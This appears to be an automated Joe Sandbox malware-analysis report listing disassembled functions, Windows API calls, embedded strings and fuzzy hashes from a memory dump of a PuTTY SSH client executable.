Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 091f86ae69201790eb6cfd4e0b00301f2119b73cbe0597b383e32b1fb51038c4
Instruction ID: 6022cdb810fb566dd535790530e760da024bc7ed32cc8471b996ca27aa20874c
Opcode Fuzzy Hash: 091f86ae69201790eb6cfd4e0b00301f2119b73cbe0597b383e32b1fb51038c4
Instruction Fuzzy Hash: 03A14972A141449FCF199F68DC92BAD7BA5EB46310F18014DF815EF3D1C7358A12DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C7C580 Relevance: 13.6, APIs: 9, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C5B7
OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C5C5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C604
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C621
GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C64B
CopySid.ADVAPI32(00000000,00000000,00000000), ref: 00C7C66A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C68B
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C69A
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C6A5

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CloseHandleLocalProcess$AllocCopyCurrentErrorFreeLastLengthOpen
String ID:
API String ID: 621491157-0
Opcode ID: 3ac11adcfc9b2433779c1faddc52fc7450a4bd3b94eaf1cf3e2ab1402ec68fa7
Instruction ID: 4c3e7ebb5fe52d0eebed3a0750af8e19d96fc2c0b70355a274338023f1571a6c
Opcode Fuzzy Hash: 3ac11adcfc9b2433779c1faddc52fc7450a4bd3b94eaf1cf3e2ab1402ec68fa7
Instruction Fuzzy Hash: 4531A5712043016FEB206FB1ECC5B2B7BE9EF54B40F05842CF949DA2A1DAB1D9009FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C682D0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 302COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C68842

Part of subcall function 00C631D0: SendDlgItemMessageA.USER32(?,?,0000014B,00000000,00000000), ref: 00C63254

Part of subcall function 00C63280: SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00C63307

Strings

Invalid '%.*s' key data, xrefs: 00C6898B
Invalid key (no key type), xrefs: 00C68905
Cannot decode key: %s, xrefs: 00C6891B
Unable to load host CA record '%s', xrefs: 00C687EC
CA key may not be a certificate (type is '%.*s'), xrefs: 00C688FB
Unrecognised key type '%.*s', xrefs: 00C68935

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemMessageSend$_strlen
String ID: CA key may not be a certificate (type is '%.*s')$Cannot decode key: %s$Invalid '%.*s' key data$Invalid key (no key type)$Unable to load host CA record '%s'$Unrecognised key type '%.*s'
API String ID: 706372605-3650709019
Opcode ID: 0d596535e9021d81cb5b80d47e94ad9d970ae80d32584c6a4103328773d999e4
Instruction ID: 5db71f3889f81df2fb8e896abf565bf3388109c73b0877dadc29def1d2dd6311
Opcode Fuzzy Hash: 0d596535e9021d81cb5b80d47e94ad9d970ae80d32584c6a4103328773d999e4
Instruction Fuzzy Hash: F981B9B59002017BD7207B21BC86E6B7A9DDF5535DF084534FD0D92253FA22EA2896F3

Uniqueness

Uniqueness Score: -1.00%

Function 00C48080 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

IsZoomed.USER32 ref: 00C480B3
GetDesktopWindow.USER32 ref: 00C4815C
GetClientRect.USER32(00000000), ref: 00C48166
IsZoomed.USER32 ref: 00C481F1
SetWindowPos.USER32(00000000,00000000,00000000,?,?,00000116), ref: 00C48252
InvalidateRect.USER32(00000000,00000001), ref: 00C48270

Strings

(, xrefs: 00C48127

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: RectWindowZoomed$ClientDesktopInvalidate
String ID: (
API String ID: 2702938005-3887548279
Opcode ID: 51965d132296bdfedc612ea7042cf9e61cabeb4053366b2b6fdab9f691f5a705
Instruction ID: 97d422348c64b47e7356a0ebc27de08bb6485a2e50875b4790dec4911628ac6b
Opcode Fuzzy Hash: 51965d132296bdfedc612ea7042cf9e61cabeb4053366b2b6fdab9f691f5a705
Instruction Fuzzy Hash: E051B0796443009FD714AF28ED46B6E7BE5FB85340F044829FA46C73B1EB31A898DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C6C240 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 122fileCOMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00C6C2D2
CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 00C6C30D
GetLastError.KERNEL32 ref: 00C6C380

Part of subcall function 00C6C520: GetCommState.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00C6C330,?), ref: 00C6C53C

Part of subcall function 00CA63A0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00CA63E1
Part of subcall function 00CA63A0: InitializeCriticalSection.KERNEL32(00D433E0,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00CA643A
Part of subcall function 00CA63A0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 00CA6448
Part of subcall function 00CA63A0: CreateThread.KERNEL32(00000000,00000000,00CA64A0,00000004,00000000), ref: 00CA6472
Part of subcall function 00CA63A0: CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 00CA647D

Part of subcall function 00CA60C0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00CA6101
Part of subcall function 00CA60C0: InitializeCriticalSection.KERNEL32(00D433E0,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00CA614A
Part of subcall function 00CA60C0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00CA6158
Part of subcall function 00CA60C0: CreateThread.KERNEL32(00000000,00000000,00CA61B0,00000004,00000000), ref: 00CA6182
Part of subcall function 00CA60C0: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00CA618D

Part of subcall function 00C7EA00: _strlen.LIBCMT ref: 00C7EA0B

Strings

\\.\, xrefs: 00C6C2DC
Opening '%s': %s, xrefs: 00C6C391
%s%s, xrefs: 00C6C2EB
Opening serial device %s, xrefs: 00C6C2BF

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Create$Event$CloseCriticalHandleInitializeSectionThread$CommErrorFileLastState___from_strstr_to_strchr_strlen
String ID: %s%s$Opening '%s': %s$Opening serial device %s$\\.\
API String ID: 2530553318-1737485005
Opcode ID: 83ddf9de7dd3b73433536ed151240b7c044223e82e9dd072903f4c08eb0d623e
Instruction ID: 13a650e252ce41463b69637d9d5ba7a7b59e33cc61e6bad13ce4d48de5bd9aa7
Opcode Fuzzy Hash: 83ddf9de7dd3b73433536ed151240b7c044223e82e9dd072903f4c08eb0d623e
Instruction Fuzzy Hash: 2041A3F5A403006FE3206F20EC86F277AE8EF54718F054538F9599B393E671E9148BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C77280 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 99networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32(?,?), ref: 00C772B2
htons.WS2_32(?), ref: 00C77315
inet_ntoa.WS2_32(?), ref: 00C77326

Part of subcall function 00C7EA00: _strlen.LIBCMT ref: 00C7EA0B

htons.WS2_32(?), ref: 00C7736F
inet_ntop.WS2_32(00000017,?,?,00000041), ref: 00C77385

Strings

%s:%d, xrefs: 00C7733C
[%s]:%d, xrefs: 00C7739B

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: htons$_strlengetpeernameinet_ntoainet_ntop
String ID: %s:%d$[%s]:%d
API String ID: 3126212605-2542140192
Opcode ID: 43907800e139f2cfaf8e98fbe8ce4fe4358144c22f3ab23ae4cc9995d8c12639
Instruction ID: 880c49a1b67f06f98dad5719f1a77d3cbb22441a906662bbfaf365213a07e225
Opcode Fuzzy Hash: 43907800e139f2cfaf8e98fbe8ce4fe4358144c22f3ab23ae4cc9995d8c12639
Instruction Fuzzy Hash: 873190B55043009FD7209F65D845B6BBBF4EF88310F00892DF99ACB2A1E775E944DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C68C40 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 77libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00C68C7C
GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 00C68C97
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00C68CB2

Strings

CryptAcquireContextA, xrefs: 00C68C76
CryptReleaseContext, xrefs: 00C68CAC
CryptGenRandom, xrefs: 00C68C91
advapi32.dll, xrefs: 00C68C60

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressProc
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 190572456-129414566
Opcode ID: 7b80a03d824e4d4651255da74b20e5748fd2cd1f35b0b7125deb5714096165a6
Instruction ID: edfba3ec182ac6c34f642be08757d2903cac097fb1c1323414f3c19e028c2bcb
Opcode Fuzzy Hash: 7b80a03d824e4d4651255da74b20e5748fd2cd1f35b0b7125deb5714096165a6
Instruction Fuzzy Hash: 57214F78205702ABDB289F25ED95B3737B5FB56741F88452CF602D63A8CB70D808DA36

Uniqueness

Uniqueness Score: -1.00%

Function 00C758D0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 00C7591C
htonl.WS2_32(?), ref: 00C75960
inet_ntoa.WS2_32(00000000), ref: 00C7596D
_strncpy.LIBCMT ref: 00C7597D

Strings

addr->addresses && step.curraddr < addr->naddresses, xrefs: 00C7594E
<unknown>, xrefs: 00C7592A
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/network.c, xrefs: 00C75949

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strncpy$htonlinet_ntoa
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/network.c$<unknown>$addr->addresses && step.curraddr < addr->naddresses
API String ID: 3148508921-3221011009
Opcode ID: 2b829e1a6f1189392ef63331ad93efb90ff0d04e146bb01101dac123aa6cec86
Instruction ID: af355dfc81d9f4217579a78863d1bcccd9cdd8f16a421923150970c0afec2b8a
Opcode Fuzzy Hash: 2b829e1a6f1189392ef63331ad93efb90ff0d04e146bb01101dac123aa6cec86
Instruction Fuzzy Hash: 5C21FD71600701EFDB109F25EC85F2B7BA8EF89760F088419FA488B252D270E845DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00C7F8D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(00000000,00000000), ref: 00C7F8DC
GetWindowLongA.USER32(00000000,000000F0), ref: 00C7F8ED
GetWindowLongA.USER32(00000000,000000EC), ref: 00C7F8F4
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00C7F90E
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00C7F914
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 00C7F923

Strings

PuTTY, xrefs: 00C7F8D0

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Window$Long$Item
String ID: PuTTY
API String ID: 4195074732-84254484
Opcode ID: 8737b3fc7df922ac85da9cf8ecd475f26323f837f17117a0c2bfed34c0211937
Instruction ID: f8b3f89ad2088da378421d11c5ae2db2b3bee3908017ffa615e915c3e203b282
Opcode Fuzzy Hash: 8737b3fc7df922ac85da9cf8ecd475f26323f837f17117a0c2bfed34c0211937
Instruction Fuzzy Hash: 73F0A03614A6287BC6103769BC04E9BBE9EDFC73B4F260311F634D22F0CB2569118AB4

Uniqueness

Uniqueness Score: -1.00%

Function 00C60520 Relevance: 12.1, APIs: 8, Instructions: 74windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,0000018A,?,00000000), ref: 00C6053F
SendDlgItemMessageA.USER32(?,?,00000189,?,00000000), ref: 00C6055D
SendDlgItemMessageA.USER32(?,?,00000199,?,00000000), ref: 00C60569
SendDlgItemMessageA.USER32(?,?,00000185,00000000,?), ref: 00C60579
SendDlgItemMessageA.USER32(?,?,00000182,?,00000000), ref: 00C60585
SendDlgItemMessageA.USER32(?,?,00000181,?), ref: 00C60596
SendDlgItemMessageA.USER32(?,?,0000019A,?,00000000), ref: 00C605A4
SendDlgItemMessageA.USER32(?,?,00000186,?,00000000), ref: 00C605B0

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemMessageSend
String ID:
API String ID: 3015471070-0
Opcode ID: b579f36bd444bca94b92b66c6f6e1e9f81c2b4196aedbb7fe44c62d6f4cd15a2
Instruction ID: d1f08c4b957336a88de1b7c859d31b517898554b49d17cb9d7a80cc5b83a57a1
Opcode Fuzzy Hash: b579f36bd444bca94b92b66c6f6e1e9f81c2b4196aedbb7fe44c62d6f4cd15a2
Instruction Fuzzy Hash: C90188716817187FF22126229C46FAF7E6CDFC7F88F014518F748691C0D9A6AE12867E

Uniqueness

Uniqueness Score: -1.00%

Function 00C55D20 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 405COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C55F6F

Strings

p->callback && "Asynchronous userpass input requires a callback", xrefs: 00C55DAA, 00C56118, 00C561A6
Terminal not prepared for interactive prompts, xrefs: 00C55D74
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/terminal/terminal.c, xrefs: 00C55DA5, 00C56113, 00C561A1

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/terminal/terminal.c$Terminal not prepared for interactive prompts$p->callback && "Asynchronous userpass input requires a callback"
API String ID: 4218353326-1781519447
Opcode ID: 4fa26259a9be3102eed050e01e36a41be096c18bdbe1e0ab173eac8d500dcc18
Instruction ID: b233a3084c940b1453c5fa1c0a127f7f77ada94a83dadf500a862a98b8997d2e
Opcode Fuzzy Hash: 4fa26259a9be3102eed050e01e36a41be096c18bdbe1e0ab173eac8d500dcc18
Instruction Fuzzy Hash: E4D1E5B8900704AFDB10DF24DC56B9A77E4AF44709F488528FC496B382D375ED98CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00CA2300 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 264COMMON

Download Yara Rule

APIs

Part of subcall function 00CA2230: __fread_nolock.LIBCMT ref: 00CA227A

_strlen.LIBCMT ref: 00CA24D6

Strings

SSH PRIVATE KEY FILE FORMAT 1.1, xrefs: 00CA23ED
file is too large to be a key file, xrefs: 00CA233C
false && "bad status value in lf_load_keyfile_helper", xrefs: 00CA2393
file format error, xrefs: 00CA23FE
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/sshpubk.c, xrefs: 00CA238E

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: __fread_nolock_strlen
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/sshpubk.c$SSH PRIVATE KEY FILE FORMAT 1.1$false && "bad status value in lf_load_keyfile_helper"$file format error$file is too large to be a key file
API String ID: 3531255544-988288142
Opcode ID: 652e25adf9ef5599b1015febc7005217ec63f70c8878fe76a6ce7d9354da31aa
Instruction ID: 73b40a456c6909a561e8cf6d8831c14c38b84ad3c3e9824ff342932f9896efee
Opcode Fuzzy Hash: 652e25adf9ef5599b1015febc7005217ec63f70c8878fe76a6ce7d9354da31aa
Instruction Fuzzy Hash: 14812BB5900311AFE710AF24EC46B6A77A5FF55308F08842CF85947252E771EA58E793

Uniqueness

Uniqueness Score: -1.00%

Function 00C73F10 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 256COMMON

Download Yara Rule

APIs

Part of subcall function 00C7BC00: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00C7BC76
Part of subcall function 00C7BC00: RegCloseKey.ADVAPI32(?), ref: 00C7BCBA

Part of subcall function 00C7BE40: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00C746D1,00000000,RandSeedFile), ref: 00C7BE67
Part of subcall function 00C7BE40: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00C7BE9F

_strcspn.LIBCMT ref: 00C73FEF
_strcspn.LIBCMT ref: 00C740CD
_strcspn.LIBCMT ref: 00C74041

Part of subcall function 00C7BCE0: RegCloseKey.ADVAPI32(00000000,00C746DC,00000000), ref: 00C7BCE4

Strings

rsa, xrefs: 00C73FA3
Software\SimonTatham\PuTTY\SshHostKeys, xrefs: 00C73F49
%s@%d:, xrefs: 00C73F2F

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strcspn$CloseQueryValue$Create
String ID: %s@%d:$Software\SimonTatham\PuTTY\SshHostKeys$rsa
API String ID: 3610292695-1153710622
Opcode ID: 49bf4f3fe983914cfbf8acce472dfe92010de92e1137cfcc766a77fabb98a2a9
Instruction ID: 6567e4a664c97c01b01e917b1e1d8a014c844d16fccf3f42a9f276cc2a24a21c
Opcode Fuzzy Hash: 49bf4f3fe983914cfbf8acce472dfe92010de92e1137cfcc766a77fabb98a2a9
Instruction Fuzzy Hash: 1F615CA2E042146FD7107A306C42B2F769CAF91344F098438FD1DA7343F776EE1492A2

Uniqueness

Uniqueness Score: -1.00%

Function 00C64B80 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 191COMMON

Download Yara Rule

Strings

&, xrefs: 00C64D30
%H%M%S, xrefs: 00C64CD5
&, xrefs: 00C64C83
&, xrefs: 00C64C31

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: LocalTime
String ID: %H%M%S$&$&$&
API String ID: 481472006-1342691861
Opcode ID: 37d15a57826d4aa994db140359ed21a493ff7422d68fcd885f40cec0c9cde6dc
Instruction ID: 07996d4019f5aec3289d6c2f3d425ffa660fd16c11ad68f9086d6299f7f234de
Opcode Fuzzy Hash: 37d15a57826d4aa994db140359ed21a493ff7422d68fcd885f40cec0c9cde6dc
Instruction Fuzzy Hash: 375107B2D09344AFD724AF20EC81A3B77A4AF51704F484929F99947342E732DA18D753

Uniqueness

Uniqueness Score: -1.00%

Function 00C45BE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 132windowCOMMON

Download Yara Rule

APIs

DeleteMenu.USER32(00000040,00000000), ref: 00C45CF8
DeleteMenu.USER32(00000040,00000000), ref: 00C45D04
MessageBoxA.USER32(00000000,00000000,00000000,00000010), ref: 00C45D7D

Strings

Unable to open terminal:%s, xrefs: 00C45D5F
%s Error, xrefs: 00C45D27
Unable to open connection to%s%s, xrefs: 00C45D4F

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
